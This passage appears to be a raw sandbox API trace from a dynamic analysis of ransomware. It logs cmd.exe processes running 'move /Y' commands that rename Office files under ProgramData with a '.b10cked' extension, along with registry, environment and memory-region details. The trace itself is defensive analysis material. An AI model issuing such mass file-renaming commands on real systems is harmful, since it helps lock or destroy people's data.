[0201.806] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.806] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.806] _wcsicmp (_String1="move", _String2="START") 
returned -6 [0201.806] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.806] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.806] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.808] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef3ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef3e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef3e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.808] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 
[0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.809] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.809] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.809] _wcsicmp (_String1="MSPOWE~2.HXN", _String2=".") returned 63 [0201.809] _wcsicmp (_String1="MSPOWE~2.HXN", _String2="..") returned 63 [0201.810] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mspowe~2.hxn")) 
returned 0x2022 [0201.810] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.810] SetErrorMode (uMode=0x0) returned 0x0 [0201.810] SetErrorMode (uMode=0x1) returned 0x0 [0201.810] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", nBufferLength=0x104, lpBuffer=0x1eed74, lpFilePart=0x1eed5c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", lpFilePart=0x1eed5c*="MSPOWE~2.HXN") returned 0x27 [0201.810] SetErrorMode (uMode=0x0) returned 0x1 [0201.810] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.810] _wcsicmp (_String1="MSPOWE~2.HXN", _String2=".") returned 63 [0201.810] _wcsicmp (_String1="MSPOWE~2.HXN", _String2="..") returned 63 [0201.810] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mspowe~2.hxn")) returned 0x2022 [0201.810] SetErrorMode (uMode=0x0) returned 0x0 [0201.810] SetErrorMode (uMode=0x1) returned 0x0 [0201.810] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", nBufferLength=0x104, lpBuffer=0x1ef1f0, lpFilePart=0x1eef88 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", lpFilePart=0x1eef88*="MSPOWE~2.HXN") returned 0x27 [0201.810] SetErrorMode (uMode=0x0) returned 0x1 [0201.810] SetErrorMode (uMode=0x0) returned 0x0 [0201.811] SetErrorMode (uMode=0x1) returned 0x0 [0201.811] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1ef3f8, lpFilePart=0x1eef88 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked", lpFilePart=0x1eef88*="MS.POWERPNT.DEV.14.1033.hxn.b10cked") returned 0x3e [0201.811] SetErrorMode (uMode=0x0) returned 0x1 [0201.811] SetLastError (dwErrCode=0x0) [0201.811] GetFileAttributesW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.powerpnt.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0201.811] GetLastError () returned 0x2 [0201.811] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ee904, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee904) returned 0x310e98 [0201.811] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x1ee904 | out: lpFindFileData=0x1ee904) returned 0 [0201.812] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0201.812] GetLastError () returned 0x12 [0201.812] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ee904, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee904) returned 0x310e98 [0201.812] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x1ee904 | out: lpFindFileData=0x1ee904) returned 0 [0201.812] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0201.812] GetLastError () returned 0x12 [0201.813] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c00) returned 0x310e98 [0201.813] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x321c00 | out: lpFindFileData=0x321c00) returned 0 [0201.813] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0201.813] GetLastError () returned 0x12 [0201.813] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c00) returned 0x310e98 [0201.813] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x321c00 | out: 
lpFindFileData=0x321c00) returned 0 [0201.813] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0201.813] GetLastError () returned 0x12 [0201.813] _get_osfhandle (_FileHandle=2) returned 0xb [0201.813] GetFileType (hFile=0xb) returned 0x2 [0201.835] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.835] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eead4 | out: lpMode=0x1eead4) returned 1 [0201.836] _get_osfhandle (_FileHandle=2) returned 0xb [0201.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eeb08 | out: lpConsoleScreenBufferInfo=0x1eeb08) returned 1 [0201.839] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.840] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeb48 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.840] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eeb2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeb2c*=0x2c) returned 1 [0201.842] longjmp () [0201.842] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.842] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.843] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.843] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.843] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.844] SetConsoleInputExeNameW () returned 0x1 [0201.844] GetConsoleOutputCP () returned 0x1b5 [0201.845] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.845] 
SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.849] exit (_Code=1) Process: id = "476" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ec0" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29346 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29347 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29348 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29349 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29350 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29351 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 29352 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29353 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29354 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 29355 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29550 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29551 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29552 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29553 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 29554 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 29555 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29556 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 29557 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29558 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29559 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29560 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29561 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29562 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29563 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29616 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 29617 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29618 start_va = 0x76ca0000 end_va = 0x76d6bfff 
entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29619 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29620 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29621 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29622 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 29623 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 29624 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 29625 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 29681 start_va = 0x1310000 end_va = 0x13cffff entry_point = 0x1310000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 673 os_tid = 0xe84 [0201.668] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb24 | out: lpSystemTimeAsFileTime=0x1efb24*(dwLowDateTime=0xad02af40, dwHighDateTime=0x1d440a9)) [0201.668] GetCurrentProcessId () returned 0xe58 [0201.668] GetCurrentThreadId () returned 0xe84 [0201.668] GetTickCount () returned 0x38f15 [0201.668] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb1c | out: lpPerformanceCount=0x1efb1c*=25845759541) returned 1 [0201.669] GetModuleHandleA 
(lpModuleName=0x0) returned 0x4a9c0000 [0201.669] __set_app_type (_Type=0x1) [0201.669] __p__fmode () returned 0x76b331f4 [0201.669] __p__commode () returned 0x76b331fc [0201.669] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.670] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.670] GetCurrentThreadId () returned 0xe84 [0201.670] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe84) returned 0x38 [0201.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.670] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.670] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.713] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.713] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efab4 | out: phkResult=0x1efab4*=0x0) returned 0x2 [0201.713] VirtualQuery (in: lpAddress=0x1efaeb, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.713] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.713] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.713] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efa84, 
dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.714] GetConsoleOutputCP () returned 0x1b5 [0201.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.716] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.716] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.718] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.725] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.732] GetEnvironmentStringsW () returned 0x3a0180* [0201.732] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0201.732] GetEnvironmentStringsW () returned 0x3a0180* [0201.732] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0201.732] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea24 | out: phkResult=0x1eea24*=0x40) returned 0x0 [0201.732] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, 
lpData=0x1eea30*=0xa8, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x1, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x1, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x0, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x40, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x40, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x40, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegCloseKey (hKey=0x40) returned 0x0 [0201.733] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea24 | out: phkResult=0x1eea24*=0x40) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x40, lpcbData=0x1eea28*=0x1000) returned 0x2 
[0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x1, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x1, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x0, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x9, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x9, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x9, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.734] RegCloseKey (hKey=0x40) returned 0x0 [0201.734] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.734] srand (_Seed=0x5b8863a3) [0201.734] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"" [0201.734] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" 